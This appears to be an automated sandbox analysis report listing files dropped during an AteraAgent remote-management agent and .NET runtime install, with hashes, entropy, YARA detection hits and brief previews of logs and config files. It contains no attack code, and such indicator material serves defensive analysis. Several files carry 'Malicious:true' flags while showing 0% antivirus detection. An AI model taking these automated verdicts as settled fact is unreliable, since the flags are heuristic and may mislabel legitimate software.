                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8889
                                                                                                                                                                                                                                        Entropy (8bit):5.667192466509971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mjBxz1ccbTOOeMeSD61k7r6IHfk7r6kAVv70HVotBVeZEmzmYpLAV77tGpY9rr:mVD2fQpQtiB2iH
                                                                                                                                                                                                                                        MD5:6024D3CC7D74C3AEEB3C018B1EA6944E
                                                                                                                                                                                                                                        SHA1:6FD5F448E617D24520925000A1BCB5955FAEB501
                                                                                                                                                                                                                                        SHA-256:2D2C8B740E6FFEC781B7B9DD64BEFD884C0D98F70AB0B506C63C932939A82519
                                                                                                                                                                                                                                        SHA-512:BE010F39BF3B061119849BAFE87F0557799B144B4414738DAF54FB3F9B59837AD8BC4400D86DE1CB02BC7B934E06AAE6F8AA2737F978FDC18CA7FEDF9FFA968F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c998f.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9555
                                                                                                                                                                                                                                        Entropy (8bit):5.573697818656053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:djBGZcRqFbLCsgRqQbLCMDp17qEVl0FfLALtyD0qagukGGhaKfmbHt1fqykkrEcZ:dVjRwgRpdMKK7yhT
                                                                                                                                                                                                                                        MD5:66087B1EDCF98C0ADD4B6F959FD48EF2
                                                                                                                                                                                                                                        SHA1:5B4C8E26B6A4D320492289154097F421FB37185A
                                                                                                                                                                                                                                        SHA-256:724DABDA314BB01314EDFB3AF60BAC905877EB5854F30217DBFFD97ECE456FCE
                                                                                                                                                                                                                                        SHA-512:99F0B2F8019A0A413BA1ED142CC775B0C714EF7C67973C0EBB1664C8AEBE98E7D08099DA5AAA709501569A0B13DA66A3851311D4334F37AC40AC72745AEBD3C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c9994.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8767
                                                                                                                                                                                                                                        Entropy (8bit):5.653399727426775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Xy7wo+fncHMeR1c6ITc6k7s5VNpkxYpLso:XPo+fncHzcVctSNpkcP
                                                                                                                                                                                                                                        MD5:A32F96C216B713E05E7734D5545EA9B8
                                                                                                                                                                                                                                        SHA1:D7D1B63286DF76465259D52E1B85CCC52FD8613E
                                                                                                                                                                                                                                        SHA-256:CAEF7119893DD24CFDA118E436CE556DB0EC54F9DDBAB436745DEB4D202E7C4A
                                                                                                                                                                                                                                        SHA-512:DD797B9F165679B9E00BA7B93DBE3931DD9B8A1993040F625CB00EDF4D572B1C25AA41B0B5DD66D0D98CC815832FCF57CD50EFB70BB81170348908EEE58AD372
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\4c999c.rbs, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):57458
                                                                                                                                                                                                                                        Entropy (8bit):5.860419906873573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:Pg8kxUr9O4QafETLKEpMzsMxlNPF73hXqiRuT2oKUG5aE/We6pEFfEojISLQTpfZ:9QSG
                                                                                                                                                                                                                                        MD5:9412E11E7E3B022B839461B374D67B38
                                                                                                                                                                                                                                        SHA1:DDB2E433C3B2F886FA86B6EF874E5DA220420942
                                                                                                                                                                                                                                        SHA-256:BF80134D54CC38A0D2A6CAADCD53DAE33A8454F988E422432DC3DDF2FEDA8F0F
                                                                                                                                                                                                                                        SHA-512:052C4AFD2394123E4E507FD381FDDB57301BAC73A21E6B3917B935291861D9274CB26E23541CC45DF537D034C57B34D2EF2DEB23A8DC04CCB747C6D48B5AB462
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9062
                                                                                                                                                                                                                                        Entropy (8bit):5.59988327757456
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:tImbnPKC5jc2KeU3N35rUqeD2+PZCsTlYUqeD2+PZC6jcS3Y30YlTlWYhIKE535K:DjKiY/e6Yv8IFv8t/EjANmWph
                                                                                                                                                                                                                                        MD5:8AE857859655D374345F00D34D08CF9B
                                                                                                                                                                                                                                        SHA1:F8AF1D77EA1DFA8B11A44C406D7FAA97797EE064
                                                                                                                                                                                                                                        SHA-256:FB200EF78CF58D666A7C46E1890023ED04BAC79FCB7DBD237EA5D7D293CE73A9
                                                                                                                                                                                                                                        SHA-512:10BF97D5398F4F7D02D506CDC23E51161B6E9A0BAAAB598216EA004C164AFAC7AFF77E3F2C46D679BDF6C136FE5819749BC42CB104209BBD7616536239A3E20F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10280
                                                                                                                                                                                                                                        Entropy (8bit):5.6131358652055106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:kQUZRj2S8ln+sejxMYN8IlN8di8k/zEYW9NYX1udXkZWpImoCKSBy5Y:kBZRj2S6iN9NJC
                                                                                                                                                                                                                                        MD5:809B54311F93477288995D94A912B090
                                                                                                                                                                                                                                        SHA1:6320BAFB8031C46F6760C338F25B388519586FDB
                                                                                                                                                                                                                                        SHA-256:19F7A1F7E4DE6C329573C5330D0173F66348A824D3B71FC98FA3AF2880A18705
                                                                                                                                                                                                                                        SHA-512:B2C00B71CD94FFA9680D5DA6E8F16A33A985733398F5E93B2BA308839C2D5A4BE6AAF2D2F6066AA3ACE6E9ADDEB2FD24CDB74CCCFAA4877D61E2774C4DC5EBEB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3816
                                                                                                                                                                                                                                        Entropy (8bit):5.059989718903799
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:QmM5sne4etTlxm7epQfTlxmpQ6WSiiRIy:lSyenk47
                                                                                                                                                                                                                                        MD5:DF0781F0395A3CD0EA421CAA956E8B08
                                                                                                                                                                                                                                        SHA1:24F13C8F79E827AE2C0764DDF086D5851512CACE
                                                                                                                                                                                                                                        SHA-256:8B1635ED5EA835226C57551BB1FEAEF8C5BB05CDD84201B3B231DC4E311CA736
                                                                                                                                                                                                                                        SHA-512:1B4B5655B25B3B2F937EBE51E10C459D7DFA94E531ED552BD1EDBAB2AB52FE4639D8AEE636C4ADB29DE09CB3C568FA99BE593F77DBE37599ED997B2F95B9D526
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@xOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....RegisterProduct..Registering product..[1]$..@......Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2A0FCDF3F1C77C147994D019CE12A6DE\InstallPropertiesx.....\...l.............H.........?...................9...................?........... ... ........... ... ................@....$..@....3.Software\Microsoft\Windows\CurrentVersion\Uninstall.............................................. ...!................... ...!.......?........... ... ................... ... .......?.......................................?.............................
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):753
                                                                                                                                                                                                                                        Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                        MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                        SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                        SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                        SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7466
                                                                                                                                                                                                                                        Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                        MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                        SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                        SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                        SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1966298
                                                                                                                                                                                                                                        Entropy (8bit):7.9989725851892
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:HELBDnMsmlLa7SwvAQAQI3/ehJQmjJaLbjvQInz96/pU7jy5EFgxivT9rnzvDbOU:kJMJig3/ekmlQjvQQLUNxqrzrmniuxa
                                                                                                                                                                                                                                        MD5:B110BA42CA8D339B18293AC3F1E94F03
                                                                                                                                                                                                                                        SHA1:E21AC41D052159076B34823D2653DB0DECDF7F8C
                                                                                                                                                                                                                                        SHA-256:C860712A06A55CDDDFED7A9F86F0DF36DA1E475B9901148D07D5B02331BA0F77
                                                                                                                                                                                                                                        SHA-512:D81EFA032F3FF5EDC247440CFF1E911A82230B757C02534209FEAD7ECF630FE5308F9A32A78CC229F175CB447735D539EB61039BFB4FF9F8E77B8DBCCDA2B0BA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39359
                                                                                                                                                                                                                                        Entropy (8bit):5.001117795800814
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Yt5DUarXaaec21v5Oc5/MNXP4RBTEQ88jnfA:YvDUarXaaecC5Oc5/mXP4TTEuA
                                                                                                                                                                                                                                        MD5:B4CB4604F8C7F02757664874D862DD77
                                                                                                                                                                                                                                        SHA1:6FDB3AEBCEAAFBCFE21333DA021DCD96F8B78B7B
                                                                                                                                                                                                                                        SHA-256:54289873BCDBAD889E6304E7E1B21D5973BBDD0E1AA73BD19382CFA23713D1CE
                                                                                                                                                                                                                                        SHA-512:46C27C62CE35512643EE023630A264BFBE1CA41B18BA44E1659B3AF26C0A44E3ABA73D7B90DB77835A76CEE33035791887B722348AA98CB2C4CC9B32F30CEF01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {.. "Agent.Package.Watchdog/1.5": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.4",.. "Atera.Agent.Package.Tools": "1.0.22",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.4": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "7.0.1",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "7.2.3",.. "Serilog.Extensions.Hosting": "5.0.1",.. "Serilog.Sinks.File": "5.0.0".. },.. "runtime": {.. "lib/net6.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.4.0",.. "fileVe
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):35920
                                                                                                                                                                                                                                        Entropy (8bit):6.456207579215664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:kj2zXcZGQ2FEagbbE9xEHCC+ud1VEpYinAMxCin:4YCauE9xc+K1O7HxF
                                                                                                                                                                                                                                        MD5:1E283F1A342729D63266E2DD2C851E2F
                                                                                                                                                                                                                                        SHA1:47B2551B2F9C3E9E6F2D68E67B1E0D0A539F315E
                                                                                                                                                                                                                                        SHA-256:98CE24EFC2EF680BFCD5D98E3AC273B148B0828D256ADBA003F57F66E1EC7FC4
                                                                                                                                                                                                                                        SHA-512:BD84EDA89C91DFEFBAEB6EA952A3BAF2EDBDBCDAB08B5A4437DB2A1F21F82A7BDDBDE9C12C00FEC8CD99FCE75CD945D189EED083BD0AD77DB00353B631DD5D20
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159824
                                                                                                                                                                                                                                        Entropy (8bit):6.224052560324469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:5czkitvo4BpYN/6mBPry8TXROLdW5m4mUR39OOGu0kpNY:5A4NCmBPry/N2jOOHS
                                                                                                                                                                                                                                        MD5:0B7534A49A757D7525F7FC966D6CAF5F
                                                                                                                                                                                                                                        SHA1:2548A8D4BFE81D194A42A6DF1761AB910DECCBCA
                                                                                                                                                                                                                                        SHA-256:312755B522A3CB212A2D5E0DF2888699C35DE233A2DC198C37475E2BF414B0A1
                                                                                                                                                                                                                                        SHA-512:4D3105E7669093DF8364543571D839D0FD573153EED27D82860984797FB30853C3F5FB7707BF97442D4AB71783012FBBB3D9AB1A2D6ACBEA335F06B756FD4796
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUkov:Wtov
                                                                                                                                                                                                                                        MD5:4F935A094C5DB43100C1C6191F1D2257
                                                                                                                                                                                                                                        SHA1:D35F739210BF40D4E936975C00BF90F015DA6847
                                                                                                                                                                                                                                        SHA-256:01AC8D880AA7CB47A4C9475593AC81924D0D51CEB9C3276BA11F5848AFA05FE1
